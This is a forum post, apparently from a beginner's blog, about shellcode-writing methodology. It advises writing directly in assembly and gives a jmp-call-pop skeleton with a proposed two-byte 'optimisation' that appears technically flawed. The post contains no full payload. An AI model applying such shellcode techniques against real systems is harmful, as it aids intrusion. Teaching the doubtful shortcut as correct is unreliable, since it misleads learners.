Wrote this months ago on my blog, before the college started and after the college started, never got time to post anything. Wandering on IRC, came to my mind of my blog, thought why not to share it with you guys here.
In this post, I’ll be telling you what mistakes you people are doing when writing shellcode and how to keep stuff simple by avoiding them.
Mistake 1The most common mistake people do is to first write the shellcode in C and then tear it apart and remove unnecessary assembly code. In almost every tutorial I have ever seen on shellcoding, the methodology to write the shellcode is :
1.) Write it in C
2.) Disassemble it and remove unnecessary assembly code.
3.) Write the necessary code (obviously assembly) in separate assembly source code file.
4.) Assemble and run it and then extract the opcodes.
Removing bad characters is optional as it depends on the type of input and in some cases, not even null bytes in the shellcode matters.
Good news, right cause it saved you from the overhead of using appropriate register and memory sizes and operands to eliminate null bytes but anyways this process it too long.
This methodology is very common even in the best books and resources on shellcoding like in The Shellcoder’s Handbook, and every here and there.
The thing I am saying is if in the end you are writing assembly code, then why the hell you aren’t doing it in first place. Now don’t say you don’t know assembly cause if that is so, then shellcoding isn’t for you. Let’s be honest guys, even in the previous method, it requires you to know assembly. Coming back to the topic, if you code it in assembly on the first hand, you save a lot if time. OKAY, I admit it takes only a minute to write a Shellcode that pops out a bash shell but then disassembling and analyzing every instruction to see if it is necessary or unnecessary in the code it tiresome and TIME WASTE. If you code it in assembly, you have many advantages.
Advantage No. 1 – It saves your time of writing, studying and removing the extra asm code from C code.
Advantage No. 2 – Since you know what you are doing, you can optimize your shellcode to the extent you want to and no bullshit as it contains only the instruction you want.
Now if you don’t know assembly, then I would really recommend you to go and learn it. I ma not talking to learn advanced assembly but knowing how functions work, how to do simple stuff, moving things here and there, calculations, syscalls and that stuff.
Mistake 2The point here is a simple logic not being used(at least I haven't seen myself anywhere). Here I am discussing about the famous
jmp-call-pop technique of writing shellcodes so as to determine the address of the string at runtime rather than binding it statically in the shellcode. Why we use this? Because if you define the string, usually the program or command name that is to be executed, it gets embedded in the binary but in the shellcode, you need it to be dynamic as the address space will be according to the new, or vulnerable binary in this case, and hence the address will point to something invalid for our use.
When using the jmp-call-pop technique, we do something like this
_start:
jmp shellcode
exploit:
# Code here that is to be executed
shellcode: call exploit
.ascii “Yo”
Now, this is just a skeleton but this is how it is written. Now ,if you see closely, there is an
unnecessary jmp, yes an UNNECESSARY JUMP.
To cut the unnecessary part, we’ll write it in this manner :
exploit: #Code here to be executed
_start: call exploit
.ascii “Yo”
In the second example(code above), you can see that we have cut the unnecessary part and SAVED 2 BYTES and it is good to save every single byte in shellcode, if you do shellcoding, you’ll know.
To be honest, I won’t really call them mistakes but I don’t really have proper words for what they should be called. :p
Possible explanation for why do they did these mistakes in The Shellcoder’s Handbook maybe it didn’t run well, what I did, on vast majority of systems while what they did, ran well. I have only done only x86 shellcoding till now.
If there is something I said wrong, do let me know, I am also a beginner, learning stuff. I will be thankful to you for your advices.
